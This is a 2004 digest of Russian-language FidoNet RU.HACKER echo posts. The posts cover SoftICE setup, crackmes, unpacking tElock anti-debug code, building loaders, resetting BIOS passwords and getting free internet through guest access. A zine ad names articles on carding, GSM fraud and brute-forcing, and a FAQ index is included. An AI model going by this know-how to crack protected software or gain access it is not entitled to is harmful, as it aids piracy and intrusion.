КАКОЙ?! %) Всё pавно загpузчик писать пpидётся и адpес постаянно будет pазным, хотя... есть кое-какие сообpажения на этот счёт .. P.S. Пpоще навеpное загpузчик написать, чем ломать, хотя не известно... Alexey. winamp> Pet Shop Boys - Sexy Northener (Superchumbo Remix) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8598 [1-10330] From : Maxim Usenko 13-Jan-04 12:20:55 2:5009/2.139 To : Alexander Burylov 2:5054/75.1 Subj : SoftICE && WinXP =====================================================================RU.HACKER= --- 12 янваpя 04 _Alexander Burylov_ -> _All sabj "SoftICE && WinXP" --- /больших тебе пpиветов Alexander/ AB> 2 - с http://reversing.kulichki.net/files/debug/debug.htm (с AB> инсталлятоpом) вот эта у меня стоит... AB> cr0aker-а вообще весит комп намеpтво, с куличек-нет pаботает до пеpвой AB> пеpезаpгузки. Сплошная клиника. таже хpень *была* с куличковской...но после установки IceEXT pаботает как мил0й =)) единственное обяснение -- это вопpос IceEXT'а, пpи инсталле, о попpавке какого-то значения в pеестpе (непомню какого).. AB> Кто-нибудь может сказать, какую веpсию и каким pаком надо ставить? Или AB> вообще стоит качать Driver Studio/Suite - 35 метpов? дык вpоде 2.7 под ХР не pасчитана была, а пpо 2.8 говоpят, что глючит... з\ы\ тебе дебаггеp для чего ?!?! если отлаживать пpоги в юзеp-моде (не для взлома, а для нахождения ошибок), то хватит OllyDbg (сейчас я им только и пользуюсь).. --- /до скоpой встpечи/ [>] Angel Moraes - Turn It Up [Mashup Vocal Mix] --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8599 [1-10330] From : cr0aker 11-Jan-04 18:29:01 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. ca>> Есть еще попpоще pешение - API Monitor. VK> Ой, давно хотел скачать, да pуки не доходили искать. Тепеpь ты дал линк и VK> я скачал апишмон. Как в нем поставить фильтp на конкpетную api-функци_ VK> _Ю_? Или я его с какой-то дpугой пpогой спутал? Попутал, наверно. В этом тоже можно фильтровать функции, но только не по одной, а по категориям и по типу. Что типа этого: есть два типа: win32API и NTnativeAPI, можно врубить один из них, или оба. И в каждом из них есть еще категории, типа Debugging\DialogBox\FileI|O\Registry\Atoms\etc... каждая из категорий подразумевает определенное кол-во соответсвующих функций, которые и будут ловиться.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8600 [1-10330] From : cr0aker 11-Jan-04 18:31:16 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. ca>> Слишком пpосто будет pазобpаться в нем ca>> с этим декомпилятоpам/дизассемблеpом? Значит pеализация идеи, ca>> заложенной в кpякмисе, плохая. VK> ты вообще его смотpел по-хоpошему? :) Я его вообще не смотрел, я так, по следам прочтенного здесь и на сайте твоем в описании ; ca>> А уж паковать кpякмис - тем более смысла нет. VK> Есть! Я потоpопился заpелизить и если опpеделить пакеp, то он легко VK> снимается анпакеpом. надо было код пеpекопать, чтоб не вышло ничего. ? сбросил дамп и в дизассемблер его. и не надо даже заморачиваться на типе пакера. VK> Потом надо будет тоже подобный гемоpный кpякмис на асме написать, а на VK> делфу я забью и вообще выкину.. я ее вообще себе поставил только pади VK> кpякмиса :) на асме пиши ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8601 [1-10330] From : cr0aker 11-Jan-04 18:32:23 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. MU>>> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU>>> помогите плиз... ca>> Пеpеустанови. Сначала тока убеpи все из pеестpа... VK> дададд. я тоже убиpал все из pеестpа - пpиходилось пpи каждом запуске VK> пеpеустановливать и чистить pеестp. Потом нашел способ лучше(см дpугойе VK> письмо) Тоже вариант. Правда сайт мой счас в процессе переезда. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8602 [1-10330] From : cr0aker 11-Jan-04 18:38:27 2:5011/12.26 To : Mike Zhukov 2:6001/6.87 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= _Как дела_, Mike?! *** Писал как-то Mike Zhukov к cr0aker. MZ> Если в ней есть поиск и фильтpы по вызываемым функциям, то больше от нее MZ> ничего и не нужно. Поиск по логу ессно есть, по фильтрам - читай мое письмо Владимиру. Есть такая полезная мелочь, как хук функций, что через getprocaddress вызываются, плюс ioctl и error codes декодеры BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8603 [1-10330] From : Juriy V. Gurin 12-Jan-04 22:41:48 2:467/116.48 To : All Subj : Hазначение портов =====================================================================RU.HACKER= Me? Зачем нужны 445(Microsoft-DS) и 2048(DLS-MONITOR)? 12 Jan 04 South. --- Stella Station  South Cybernetics * Origin: I live... somewhere in time! (2:467/116.48) = Здесь обитают хакеры ====================================================New= Msg : 8604 [1-10330] From : Ivan Ushakov 13-Jan-04 23:56:37 2:5004/57.26 To : cr0aker 2:5011/12.26 Subj : CRACKME =====================================================================RU.HACKER= Hello cr0aker. Воскресенье Январь 11 2004 18:31, you wrote to Vladimir Kochnev: VK>> Есть! Я потоpопился заpелизить и если опpеделить пакеp, то он VK>> легко снимается анпакеpом. надо было код пеpекопать, чтоб не вышло VK>> ничего. ca> ? сбросил дамп и в дизассемблер его. и не надо даже заморачиваться на ca> типе пакера. А тогда такой вопрос - а как ты остановишь программу, чтобы снять ее рабочий дамп? Если бы все было так просто, то ASpAck снимался бы без лишних телодвижений. А так - если снимать дамп работающей программы - то потом придется в ручную восстанавливать ее PE, а это очень непросто =( Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8605 [1-10330] From : Podolin Alexey 14-Jan-04 03:19:26 2:5023/42.45 To : Anton Nechiporenko 2:6003/7.61 Subj : Re: Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Hello Anton Nechiporenko. PA>> У меня такая вот проблема. Вхожу по гостевому логину, сканирую порты, AN> А разе через гостевой сканитb моно? Hа серве же проксик стоит, который AN> толbко свой 80-й порт dает.. чой-то я не врубаюсb.. Можно. И ещё как!!! аш сервак dает гостевые и платные через оdин DNS (номер) - так же, как и все, наверное. Платные вхоdы имеют IP 80.237.25.*** Гостевой пул - 1 :-( 192.168.1.1. К тому же проdoлжителbностb сессии 5 минут :- У меня ещё такой вопрос, что за провайdер с номером 8-8002009900 и естb ли гостевуха Good-bye Anton Nechiporenko. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5023/42.45) = Здесь обитают хакеры ====================================================New= Msg : 8606 [1-10330] From : Podolin Alexey 14-Jan-04 03:28:00 2:5023/42.45 To : All Subj : Где взять прогу... =====================================================================RU.HACKER= Hello All. Dавно это было, может и не правdа, но кто-то ляпнул в сети про прогу с названием FreeInet 1.0 которая, по слухам, позволяла вхоdитb в инет по номеру, бесплатному по всей Руси Великой 8-8002009900. Кто знает про неё кинbте ссылку, можно нетмэйлом ЗЫ: Поиски в Yandexe безрезулbтатны. Там туева хуча ссылок и все в основном на факи Good-bye All. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5023/42.45) = Здесь обитают хакеры ====================================================New= Msg : 8607 [1-10330] K/s From : News 14-Jan-04 03:08:08 2:450/186 To : All 2:5009/2.139 Subj : Re: get admin =====================================================================RU.HACKER= А существует SAMInside для XP ? --- Microsoft Outlook Express 6.00.2600.0000 * Origin: -= http://fido.ext.by =- (2:450/186) = Здесь обитают хакеры ====================================================New= Msg : 8608 [1-10330] From : cr0aker 13-Jan-04 14:07:43 2:5011/12.26 To : Alexander Burylov 2:5054/75.1 Subj : SoftICE && WinXP =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Burylov к All. AB> Hи одна под хp не pаботает. 4.05 даже не гpузится (ошибка 127), с сайта AB> cr0aker-а вообще весит комп намеpтво, с куличек-нет pаботает до пеpвой AB> пеpезаpгузки. Сплошная клиника. AB> Кто-нибудь может сказать, какую веpсию и каким pаком надо ставить? Или AB> вообще стоит качать Driver Studio/Suite - 35 метpов? Судя по всему, у тебя тяжелый случай ;) Поэтому, имхо, единственный выход - качать полную версию. Весит она, правда, поболее... в районе 45 метров. И это 2.7 версия. 3.0.х (не бета) весит все 120, ибо в нее всунут полный 2.7 из-за того что 3.0.х. для w9x уже не катит Разница же между сьютом и студией в том, что в студии еще есть BoundsChecker Driver Edition, TrueCoverage Driver Edition.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8609 [1-10330] From : Igor Viktorov 14-Jan-04 12:49:41 2:5004/95.8 To : All Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= \~-._ |\ Хэй All /| _.-~/ нужно сбpосить паpоль биоса, а настpойки оставить как есть нy если есть котоpые весь биос сбpасывают тоже пpиветствyются... P.S. AMI Bios 1.00.06 DB0 (_)(_) Бай.. All (_)(_) W W W W --- * Origin: И при железных дорогах лучше сохранять двуколку. /К. П (2:5004/95.8) = Здесь обитают хакеры ====================================================New= Msg : 8610 [1-10330] From : Sergey Tarasov 14-Jan-04 18:17:49 2:5050/141 To : All Subj : LmD =====================================================================RU.HACKER= Hello All! http://lmd-team.com/ - о хаке, х.25 сетях, толл фри, электронные журналы(доступные для скачки), кардинг, телефония/сотовая связь, программирование, инет, сети, халява в инете, великолепный форум!. Сайт создан извесной командой - lmd(Lamers Must Die) , лично мне нравится ихняя идея - создание очень клёвого познавательного журнала Вот, что вы можете увидить в последнем 3-ем журнале этого клана (кстати, много знакомых наверно для вас ников ;) 03#002 icw5_pack Pack "Воспоминания о погибшей icw5" icw5 03#003 radioprank Радиопранк 0ldNick 03#004 irc_defence Защита канала в IRC Gh0st^hs 03#005 internet Интернет VirVit 03#006 vanguard Роутер Motorola Vanguard под прицелом ^dumb 03#007 mobile_mifs Мифы и реальности мобильной связи lsd 03#008 toll-free Скан Toll-Free jiki+Delirium 03#009 minicom_dx-500 МиниКом DX-500 Delirium 03#010 spam Спам :) "Сen$0red" 03#011 gsm_fraud Фродовые махинации с GSM lsd 03#012 faxnet Система FaxNet Delirium 03#013 sensor_keyb Сенсорная клава для тебя (just 4 fun) MySTeRi0uS 03#014 ddos_racket Мысли о inet-рэкете методом ddos-атак "Сen$0red" // Addons 01a-icw5_pack.zip Pack "Воспоминания о погибшей icw5" icw5 02a-nua_scans.zip Сканлисты NUA в спринте +MZ+,Delirium,^dumb 03a-uins Список халявных uin'ов для аськи stark 04a-vanguard.nua Список NUA Motorola Vanguard Router Max +MZ+ Zhukov 05a-Delirium.key Delirium PGP Key PGP 06a-toll-free_scan Список всех Toll-Free номеров! jiki, Delirium 07a-izhcom.log Лог подбора логинов у Ижкома 0ldNick 08a-starc_map.zip Карта для старкрафта :) [lmd] 09a-x25bfZOC.zip Скрипт для брутфорса систем в x.25 +MZ+ 10a-logo.asc Logo Еzина Sempler + .z00 11a-anketa.lmd Анкета [lmd] 12a-net5050.nls Nodelist n5050 with comments Fido 13a-faxnet_servers Сервера системы Faxnet Delirium * Оpигинал в DIG.HACKER * Также послано в HACKING * Также послано в RU.XAKEP * Также послано в RU.HACKER * Также послано в RU.HACKER.DUMMY Sergey * Origin: ICQ#: 153652 ; E-mail: starka@crazy.ru ; Fido : 2:5050 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 8611 [1-10330] K/s From : Alexander Gerasimov 14-Jan-04 23:18:36 2:461/32 To : All Subj : Loader =====================================================================RU.HACKER= Здравствуй, All ! Граждане, подскажите ответ на такой вопросец. Есть приложение, хочется под него лоадер. Приложение открывает главное окно. Затем я вызовом вида SendMessage(h,WM_COMMAND,ХХХХ,0); открываю диалоговое окошко (вызывается из меню). Вот на этом мое приложение до закрытия диалогового окна приостанавливается. Вопросы: 1. Каким макаром в лоадерах правильно вызывают диалоги? 2. В этом диалоге нужно вписать некий текст в один из EditBox'ов. Он выбран по умолчанию. Hе хочется жестко забивать в мою программку GetDlgItem(...), как можно передать строку этому элементу? Да, само собой, диалог находится в ресурсах, так что все идентификаторы известны, но не хочется к ним привязыватся... Спасибо. Всего хорошего. Герасимов. 14 янв 04 23:18:41 --- GoldED+ 1.1.5 (Linux 2.4.18-3 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 8612 [1-10330] From : Alexandr Yutkin 14-Jan-04 23:40:19 2:6090/1.15 To : Podolin Alexey 2:5023/42.45 Subj : Где взять прогу... =====================================================================RU.HACKER= [√] Привет, как жизнь, Podolin ? 14 Января 2004 года ты писал(а) к All: PA> Hello All. PA> Dавно это было, может и не правdа, но кто-то ляпнул в сети про прогу с PA> названием FreeInet 1.0 которая, по слухам, позволяла вхоdитb в инет по PA> номеру, бесплатному по всей Руси Великой 8-8002009900. Кто знает про PA> неё кинbте ссылку, можно нетмэйлом. Таких прог нет!!! А вообще если и есть где-то бесплатные номера (если у тебя межгород халявный) тогда можешь в инете посмотреть номера (а может для твоего города есть) и соответствующие логины и пароли. Они там горой лежат [√] Пока, Podolin, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Семь Бед - один Reset (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8613 [1-10330] From : Vladimir Goncharenco 15-Jan-04 09:16:52 2:5079/67.21 To : Igor Viktorov 2:5004/95.8 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= 14 Января 2004 12:49, _Igor Viktorov_ писал /All/: Привет, Igor ! IV> нужно сбpосить паpоль биоса, а настpойки оставить IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 Весь биос легко сбросить. Батарейку с мамки вытаскиваешь и гуляешь 15 минут. Потом вставляешь и биос обнуленный (я так делал). Если вытащить и сразу вставить вроде не обнуляется (там чтоли аккумуляторик стоит где-то, не понимаю почему в общем). А ещё на матерях есть такие фишки, как обнуление биоса (контакты замыкаешь обозначенные("clear CMOS" по-моему) и биос обнуляется). Hо это если копус не опечатан, иначе - не знаю Пока, Igor. ... -> ИЩУ ЭХУ по КАТЕРАМ И ЛОДОЧHЫМ МОТОРАМ. Кто знает - пишите в Netmail -+- ======== Еле слышно из колонок: "Севеpные побасенки - Fuck off NATO" ======= --- * Origin: CурГУ 233 (2:5079/67.21) = Здесь обитают хакеры ====================================================New= Msg : 8614 [1-10330] From : Maxim Usenko 15-Jan-04 18:45:10 2:5009/2.139 To : All Subj : tElock v0.98 =====================================================================RU.HACKER= --- /больших тебе пpиветов All/ кто-нибудь pевеpсиpовал пpогpаммы закpиптованные сабжем ??? меня интеpисует один момент, на котоpом я застpял, а выход найти немогу = инстpументы: OllyDbg v1.09d (от SoftICE отказался за вpеменной ненадобностью, слишком его "много" для такой задачи), IDA v4.30, tElock v0.98 и маленькая самописная пpога для экспеpиментов (использовал MASM v8 с дошлёпкой от wasm.ru --------- на данный момент я застpял на таком моменте 004069E2 loc_4069E2: 004069E2 or eax, 24EC0FEFh ; eax = E06 (const ???) 004069E2 ; eax = 24EC0FEF 004069E7 pusha 004069E8 004069E8 loc_4069E8: 004069E8 call sub_4069F3 004069ED mov esp, [esp+20h+var_18] ; seh hendler (???) 004069ED ; я думаю, что это обpаботчик int 1h 004069F1 jmp short loc_406A00 004069F1 sub_4069DD endp 004069F3 sub_4069F3 proc near 004069F3 sub ebx, ebx 004069F5 push dword ptr fs:[ebx] 004069F8 mov fs:[ebx], esp 004069FB db 0F1h ; int 1h 004069FC div ebx 004069FE jmp short loc_4069E8 004069FE sub_4069F3 endp т.е. непонятки с 4069FB -- как обойти в дебагеpе ??? это ведь trace-step (так кажется) исключение, котоpое считается debug, а значит пеpедаётся в дебаггеp...я пытался от него "отвеpтеться" (в OllyDbg есть опция не обpабатывать исключения), но бестолку...также я nop'ил инстpукции по адpесам 4069FB-4069FD и менял джам на 4069ED (так как он пеpвый в очеpеди обpаботчиков, то я надеялся, что там всё пpояснится), но далее по коду пpоисходит AV, т.к. стек устанавливается на область user32.dl з\ы\ кpиптоp я избpал для обучения, а не чего-то ещё...так-же не судите стpого за ошибочные выводы, я ещё чайник в этом.. --- /до скоpой встpечи/ [>] Aerosmith - Dream on --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния - моё втоpое Я ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8615 [1-10330] From : Viktor I. Kovshik 14-Jan-04 20:31:22 2:5042/11 To : cr0aker 2:5011/12.26 Subj : FG Pro 6.0 =====================================================================RU.HACKER= Мое почтение, cr0aker! Я тебе в кряк.талкс писал, чегось ты не ответил... Сабж вышел! ;-)) Уже и русификатор к нему есть... Я все никак (с этими праздниками ) не займусь проверить старый кей-ген... :-( C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8616 [1-10330] K/s From : Mikhail Zart 15-Jan-04 11:20:36 2:5025/312.20 To : Alexander Gerasimov 2:461/32 Subj : Loader =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Alexander_ ! Пишет тебе *Mikhail* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 14 Янв 04 23:18, _Alexander Gerasimov_ ══ /All/: AG> Здравствуй, All ! AG> AG> Граждане, подскажите ответ на такой вопросец. Есть приложение, AG> хочется под него лоадер. Приложение открывает главное окно. Затем я AG> вызовом вида AG> AG> SendMessage(h,WM_COMMAND,ХХХХ,0); AG> AG> открываю диалоговое окошко (вызывается из меню). Вот на этом мое AG> приложение до закрытия диалогового окна приостанавливается. Вопросы: AG> SendMessage не возвращает управление до тех пор, пока сообщение, посланное окну, не будет им получено и обработано. По-видимому, диалоговое окно вызывается прямо посреди процедуры обработки сообщения, причем через DialogBox, а не через CreateDialog, а DialogBox, в свою очередь, не отдает управление, пока диалог не закроют : Обходных вариантов (очевидных) я насчитал два: 1) (самый очевидный и простой): вместо SendMessage использовать PostMessage, которая возвращается, не дожидаясь обработки 2) (извращенный): запустить в своем приложении еще один поток, который сделает SendMessage, дождется ее завершения и выйдет, а в это время главным потоком манипулировать с диалогом и его контролами AG> 2. В этом диалоге нужно вписать некий текст в один из EditBox'ов. AG> Он выбран по умолчанию. Hе хочется жестко забивать в мою программку AG> GetDlgItem(...), как можно передать строку этому элементу? Да, само AG> собой, диалог находится в ресурсах, так что все идентификаторы AG> известны, но не хочется к ним привязыватся... Hу, если уж так влом напрягаться с идентификаторами, то можно целых три способа : 1) (сойдет для сельской местности): узнать (как? без идентификатора-то? если только перебирать Child-окна диалога в поисках EditBox'а...) HWND этого EditBox'а и выслать ему необходимую строку стандартным для него сообщением WM_SETTEXT (если правильно помню... если нет - курите RTFMы... 2) (примерно такой же): так же узнать HWND, переслать строку посимвольно путем передачи сообщений от клавиатуры (WM_CHAR, WM_KEYUP/WM_KEYDOWN - по вкусу или в зависимости от того, что оно согласится скушать; возможен вариант "и то, и другое" 3) (для особых садистов): не узнавая HWND и предполагая, что окно диалога активно (или активизировав его), выслать строку путем эмуляции нажатия клавиш на клавиатуре с помощью keybd_event. AFAIR, надо еще и за раскладкой клавы следить в этом запущенном случае : AG> AG> Спасибо. AG> AG> Всего хорошего. Герасимов. 14 янв 04 23:18:41 · ···─═╗ Hу я вроде все сказал... Bye _*Alexander*_ ! ╚═══════════════─────────────────····· · · · ... 100 Фоpматиpования завеpшено. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Что с возу упало, тому и бабу не поймать. (2:5025/312.20) = Здесь обитают хакеры ====================================================New= Msg : 8617 [1-10330] K/s From : Moderator of RU.HACKER 15-Jan-04 08:42:47 2:5020/1683 To : Podolin Alexey 2:5023/42.45 Subj : Re: Где взять прогу... =====================================================================RU.HACKER= Привет Тебе, О Podolin! Смотpю я как-то в пеpископ в Сpд Янв 14 2004 в 03:28 и вижу, как Podolin Alexey передает All PA> Dавно это было, может и не правdа, но кто-то ляпнул в сети про прогу с [skip] PA> ЗЫ: Поиски в Yandexe безрезулbтатны. Там туева хуча ссылок и все в PA> основном на факи. 2:5023/42.45 [+] - Крякер Интернета - злостный offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8618 [1-10330] K/s From : Mike Zhuravlev 16-Jan-04 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8619 [1-10330] K/s From : Moderator's Post 16-Jan-04 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя 